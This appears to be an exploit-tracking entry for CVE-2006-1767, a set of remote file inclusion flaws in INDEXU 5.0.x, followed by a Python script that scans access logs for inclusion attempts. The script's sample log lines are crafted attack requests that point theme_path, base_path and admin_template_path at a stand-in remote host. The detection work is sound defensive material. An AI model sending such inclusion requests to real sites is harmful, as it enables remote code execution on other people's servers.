CVE-2006-1767
nicecoder INDEXU 5.0.0-5.0.1 - Remote File Inclusion via theme_path and base_path Parameters
Title source: llm
Exploitation Summary
EIP tracks 2 public exploits for CVE-2006-1767. PoCs published by SnIpEr_SA.
AI-analyzed exploit summary: The provided text describes multiple remote file inclusion vulnerabilities in the 'indexu' application, allowing attackers to execute arbitrary PHP code by manipulating input parameters. It lists affected versions and example exploit URLs.
Description
Multiple PHP remote file inclusion vulnerabilities in nicecoder.com INDEXU 5.0.0 and 5.0.1 allow remote attackers to execute arbitrary PHP code via a URL in the theme_path parameter in (1) index.php, (2) become_editor.php, (3) add.php, (4) bad_link.php, (5) browse.php, (6) detail.php, (7) fav.php, (8) get_rated.php, (9) login.php, (10) mailing_list.php, (11) new.php, (12) modify.php, (13) pick.php, (14) power_search.php, (15) rating.php, (16) register.php, (17) review.php, (18) rss.php, (19) search.php, (20) send_pwd.php, (21) sendmail.php, (22) tell_friend.php, (23) top_rated.php, (24) user_detail.php, and (25) user_search.php; and the (26) base_path parameter in invoice.php.
Exploits (2)
The provided text describes multiple remote file inclusion vulnerabilities in the 'indexu' application, allowing attackers to execute arbitrary PHP code by manipulating input parameters. It lists affected versions and example exploit URLs.
This exploit demonstrates a remote file inclusion vulnerability in INDEXU v5.0.1, where the `admin_template_path` parameter is used to include arbitrary remote files. The vulnerability affects multiple admin scripts, allowing an attacker to execute malicious code by manipulating the parameter.
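A log check for the parameters named in the description and exploit summaries above, added here as an example and not part of the original entry or of INDEXU: it flags requests where `theme_path`, `base_path` or `admin_template_path` carries a remote location instead of a local path. The sample log lines, the `/indexu/` prefix, `placeholder.php` and the host `example.invalid` are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Scripts listed in the CVE description as taking theme_path.
THEME_PATH_SCRIPTS = {
    "index.php", "become_editor.php", "add.php", "bad_link.php", "browse.php",
    "detail.php", "fav.php", "get_rated.php", "login.php", "mailing_list.php",
    "new.php", "modify.php", "pick.php", "power_search.php", "rating.php",
    "register.php", "review.php", "rss.php", "search.php", "send_pwd.php",
    "sendmail.php", "tell_friend.php", "top_rated.php", "user_detail.php",
    "user_search.php",
}
# The page does not name the affected admin scripts, so match on any script.
ANY_SCRIPT_PARAMS = {"admin_template_path"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with scheme:// or a protocol-relative // is not a local path.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)

# Constructed access-log lines (combined log format, documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Apr/2006:12:00:01 +0000] "GET /indexu/index.php?theme_path=http%3A%2F%2Fexample.invalid%2Fx.txt%3F HTTP/1.1" 200 512',
    '192.0.2.11 - - [10/Apr/2006:12:00:02 +0000] "GET /indexu/browse.php?cat=3 HTTP/1.1" 200 2048',
    '192.0.2.10 - - [10/Apr/2006:12:00:03 +0000] "GET /indexu/invoice.php?base_path=//example.invalid/a HTTP/1.1" 200 90',
    '192.0.2.12 - - [10/Apr/2006:12:00:04 +0000] "GET /indexu/search.php?keyword=http://example.invalid HTTP/1.1" 200 700',
    '192.0.2.10 - - [10/Apr/2006:12:00:05 +0000] "GET /indexu/admin/placeholder.php?admin_template_path=http%253A%252F%252Fexample.invalid%252Ft HTTP/1.0" 200 64',
]

def watched(script, param):
    return (param in ANY_SCRIPT_PARAMS
            or (param == "theme_path" and script in THEME_PATH_SCRIPTS)
            or (param == "base_path" and script == "invoice.php"))

def find_rfi_attempts(log_lines):
    """Return (line_number, script, parameter) for each suspicious request."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        script = url.path.rsplit("/", 1)[-1].lower()
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            value = unquote(value)  # second decode catches double-encoded values
            if watched(script, name) and REMOTE_RE.match(value):
                hits.append((n, script, name))
    return hits

if __name__ == "__main__":
    print(find_rfi_attempts(SAMPLE_LOG))
```

Only the query string is inspected, so values sent in a POST body need the same check applied at a WAF or in application logging.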